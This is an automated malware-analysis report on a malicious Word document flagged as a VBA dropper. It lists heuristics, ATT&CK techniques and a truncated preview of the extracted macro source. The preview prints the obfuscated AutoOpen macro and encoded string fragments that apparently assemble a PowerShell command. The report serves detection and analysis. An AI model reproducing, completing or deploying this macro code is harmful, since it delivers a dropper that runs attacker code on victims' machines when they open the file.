MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The Autoopen macro and Shell() call indicate an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent-6545420-0' suggests it functions as a dropper for other malware. No specific family could be identified from the provided evidence.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6545420-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6545420-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110276 bytes |
SHA-256: 41b537fc3993a72a442118be569cd6e42a138e1516f0a2ce345764c8c8358c50 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QfiBpDYOoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub wwqcI(zoEjiN)
VJQED = HTiBUi
ZXnEw = aXkIH
kMvZq = qGNMZj + Sgn(3169 - MwrNz - ulHZA + Fix(99793)) - 68921 - CDbl(35445)
klBJjS = 33649
End Sub
Sub tsRdb(NwHCo)
ijWKkd = EVYqAY
daXWU = vkzVfs
bubtz = THEOqY + Sgn(7443 - MpVBR - Gjmak + Fix(65321)) - 98461 - CDbl(8029)
jBisJX = 20508
itEENZ = jwQVi
bUOmMv = AJPwP
VNMju = BurIMA + Sgn(88016 - atlRd - zHhQF + Fix(95066)) - 52367 - CDbl(5603)
UiIpzD = 97040
RWYjA = LBmSoh
YwStO = jwbwV
AWiDKu = bZTuE + Sgn(78704 - XVOTim - owfqw + Fix(72110)) - 81454 - CDbl(34380)
qaDhz = 25046
End Sub
Sub zbYlFh(DNEPp)
iHRjd = awNOI
KBcUB = zKnQs
AQGrc = sWAGqi + Sgn(16199 - Enmjk - QZvjb + Fix(68598)) - 24038 - CDbl(94799)
fXRPL = 67082
FiVlW = MDKuLh
LYDff = bVaQsQ
FViYSw = rhDNzq + Sgn(57075 - rVhXf - EGUmkV + Fix(15101)) - 84504 - CDbl(58483)
dUbjr = 40505
End Sub
Sub Autoopen()
On Error Resume Next
bOvLdU = jpMNdF
UkABOO = ibdzDk
iOzVWi = Jjjam + Sgn(58581 - vJtOY - IkbicG + Fix(22)) - 86429 - CDbl(76045)
LajFC = 51087
DRhlWYCzIh (rGWdL + IwjIzQuJVs + Racjj)
SjkiBb = nStPiN
RXACZ = UtBHB
zjKEA = TFVia + Sgn(90838 - dHnwwr - QpitZZ + Fix(20454)) - 56368 - CDbl(34800)
hdcvi = 20215
End Sub
Sub NssPHA(wFTvvh)
CQOpHA = ibMpn
AzSmzz = jGwYJ
zzUFOh = biNOFX + Sgn(19050 - jRjZT - iwnhw + Fix(96356)) - 42931 - CDbl(26450)
RpjRAT = 18934
zIDVW = Dhbnzz
SwqlRw = YSjONi
ZYFJsZ = jRPiMO + Sgn(68927 - UKXOG - rqfjUc + Fix(93588)) - 59574 - CDbl(47059)
HnoiIW = 58631
Ztija = EkzYz
rzcvh = ZZYzzE
bbYaFs = jRoMQK + Sgn(31915 - ikiYhz - HLswZz + Fix(9659)) - 64413 - CDbl(55252)
inwbfJ = 84545
End Sub
Sub ztaLPf(RzuoS)
WtdUNh = SAbjL
lXRAw = mrhGXv
NaIzKs = THtUH + Sgn(35400 - jOwRqz - tzzwvO + Fix(60109)) - 67058 - CDbl(79768)
GYRUiJ = 1720
End Sub
Attribute VB_Name = "qBwddwtjw"
Sub diojv(UaIDOi)
lSGOjA = AEwBz
zPVCDP = bFGzZ
SzIBzC = VNLXi + Sgn(19275 - pDZknj - zFFFAz + Fix(28037)) - 7347 - CDbl(61244)
HoGiI = 85352
End Sub
Function IwjIzQuJVs()
On Error Resume Next
Awodm = zUtja
jWLtf = uCvzD
RhzQuD = hLVjos + Sgn(37967 - BHlGP - fzovva + Fix(27543)) - 27064 - CDbl(79929)
DvqLF = 7593
CifRQo = hdozj
McTsV = DdVqqC
lXiDV = jNnAtw + Sgn(80151 - NtrWDh - iaXCW + Fix(36321)) - 62563 - CDbl(34752)
soPGDw = 6298
szXrWjUpv = GInjl("aBTy'+'('+')XUame'+'tI-eXU'+'a+'+'XUakXUa'+'+Qlih0B", 19390 + 7 - 19390, 19390 + 43 - 19390)
SOwzZ = ZtjAqj
TnUpGw = AzQDv
IFijY = qSDol + Sgn(46091 - wzJqS - iCYBvR + Fix(93281)) - 3159 - CDbl(93778)
TwtBS = 37472
aShJF = YpKhX
MZPpAq = cuUFf
InzsiQ = IQzLT + Sgn(9612 - GHShMr - TTwSz + Fix(63264)) - 80437 - CDbl(97287)
FNBZz = 46926
EsrssYZ = GInjl("%S+'Jtln'+'W'+'TJtoDyse.'+'UYYGTy{yrt{)'+'XC'+'DAGTy '+'ni'+' cfsaGT'+'y'+'(h'+'ca'+'e'+'rof;'+')'+'XU'+'aeXUa+X'+'UMHk%", 39851 + 5 - 39851, 39851 + 114 - 39851)
zbRXmv = DWvzRU
nsoMpU = ZljKKL
wRfvhj = FvUlY + Sgn(83063 - wCjXdd - UNNID + Fix(55737)) - 45018 - CDbl(81029)
MckjEE = 30276
jwDdD = hiMlz
tpThE = SphUO
NKKNa = sTUnR + Sgn(34089 - HEJAd - rYzrH + Fix(99260)) - 33907 - CDbl(72949)
YQiMiw = 31246
Awzmdq = GInjl("cBa'+'xe.XUa( + BS'+'NG'+'Ty'+' + X'+'UaK4TXUa'+'RwT3", 3383 + 5 - 3383, 3383 + 47 - 3383)
zUIHsi = FYBizK
oDOWj = SDNIT
vEJEjF = KLjVzz + Sgn(87393 - lizno - PcazLR + Fix(99932)) - 51615 - CDbl(88554)
zovjq = 91117
bjJFps = rzTFwi
lcSUm = iXUAjD
FXMIq = TkJcK + Sgn(50642 - vWJAXG - CwifG + Fix(50538)) - 37503 - CDbl(27518)
PIVmY = 59856
ZzLbDi = GInjl("ZMSi[eMohsp$ (. | )43]RaHc[,'yse' eCALPerC-29]Ra9V", 37488 + 3 - 37488, 37488 + 44 - 37488)
nLPoL = bzHuA
HNTddr = HsjBQ
EfuUon = QCVoI + Sgn(33129 - jWiXM - bGqvis + Fix(90913)) - 14671 - CDbl(45696)
GKwAGn = 64772
jOojGP = HBclv
KhsIS = WOzlG
qwroGc = JBIIZ + Sgn(97738 - OKtKTM - qDXqts + Fix(50504)) - 37566 - CDbl(36976)
chuPQa = 37853
TmfDR = GInjl("WaVX'+'Uaov'+'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.